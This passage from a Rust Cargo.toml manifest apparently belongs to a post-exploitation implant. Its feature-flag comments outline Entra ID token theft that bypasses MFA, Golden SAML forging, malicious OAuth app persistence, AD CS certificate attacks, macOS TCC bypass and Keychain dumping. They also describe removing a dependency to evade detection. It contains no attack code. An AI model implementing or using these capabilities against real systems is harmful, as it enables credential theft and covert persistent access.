# Azure Commercial and Azure Government cloud endpoints.  Token management
# includes automatic refresh, expiry tracking, and thread-safe caching.
# Graph API helpers: list users, groups, applications, and custom queries.
# Cross-platform (Entra ID is cloud-based — no Windows-only APIs needed).
# Gated by `entra-ptc` feature flag (implies `ring` for RSA signing).
entra-ptc = ["dep:ring"]

# Entra ID credential attacks: PRT theft (browser cookies, DPAPI, WAM,
# CloudAP extraction), Pass-the-Certificate (reuse of entra_ptc patterns),
# Golden SAML (AD FS token-signing key extraction and SAML 2.0 assertion
# forging), and token utilization helpers (Graph API, ARM, Key Vault).
# PRT bypasses MFA — no Domain Admin or LSASS access needed.  Tokens held
# in memory only.  Implies `ring` (RSA signing, SHA-256 digest) and
# `entra-ptc` (shared types: CloudEnvironment, CertSource, TokenResponse).
entra-attacks = ["dep:ring", "entra-ptc"]

# Entra ID OAuth application abuse: register malicious applications in a
# compromised Azure AD tenant, grant them high-privilege API permissions
# (Mail.Read, Files.Read.All, Directory.Read.All, RoleManagement), and
# authenticate via client-credentials flow for persistent password-free
# access.  App secrets are encrypted via HKDF from the session key — never
# stored in plaintext.  Includes tenant enumeration, mailbox/file access,
# and Global Admin elevation.  Cross-platform (cloud API).  Implies
# `entra-ptc` for shared Graph API types (CloudEnvironment, TokenResponse,
# GraphUser, GraphGroup, etc.).  No additional crate dependencies beyond
# reqwest, serde, hkdf, and sha2 (all already in the dependency tree).
entra-app-abuse = ["entra-ptc"]

# Active Directory Certificate Services (AD CS) attack capabilities:
# ESC1-ESC8 template/CA enumeration via LDAP (wldap32.dll, no IAT entries),
# static vulnerability detection, certificate requests via certreq.exe
# (temp CSR files cleaned up immediately — certificates held in memory only),
# and PKINIT Kerberos authentication with the obtained certificate.
# Certificate-based attacks survive password resets.  Requires a domain-
# joined Windows environment.  Windows-only via `#[cfg(windows)]` in the
# module.  No new crate dependencies beyond what is already in the tree.
adcs-attacks = ["dep:ring"]

# Mobile post-exploitation: Android and iOS persistence and post-exploitation
# modules.  When enabled, the full implementation modules in android/ and ios/
# are compiled.  When disabled (default), stub functions return clear error
# messages indicating that `mobile-postexp` must be enabled.  Cross-platform
# (Android aarch64/x86_64, iOS aarch64).  No additional crate dependencies.
mobile-postexp = []

# macOS post-exploitation: TCC bypass (database manipulation, synthetic click,
# vulnerable process delegation), SIP status assessment and capability
# enumeration, XPC service discovery and privilege escalation abuse,
# Keychain dump and Secure Enclave key enumeration.  Uses raw FFI to
# Apple frameworks (CoreFoundation, CoreGraphics, Security, Foundation)
# via inline #[link] attributes — no external crate dependencies.
# macOS-only (aarch64-apple-darwin and x86_64-apple-darwin).
# Gated by `macos-postexp` feature flag.
macos-postexp = []

[[bin]]
name = "agent-standalone"
path = "src/main.rs"

# rdev was removed in V4-2-04: its static user32.dll IAT imports created
# detectable entries that defeated the agent's IAT hygiene.  HCI event capture
# now uses runtime-resolved APIs (pe_resolve on Windows, evdev on Linux,
# CGEventTap on macOS) with no static imports.

[dependencies.chrono]
version = "0.4"
optional = true

[dependencies.twox-hash]
version = "1.6"
optional = true

[dev-dependencies]
criterion = "0.8.2"
rcgen = "0.14.7"
tempfile = "3.27.0"

[build-dependencies]
base64 = { workspace = true }
getrandom = "0.2"
serde_json = "1.0"

[[bench]]
name = "agent_benchmark"
harness = false
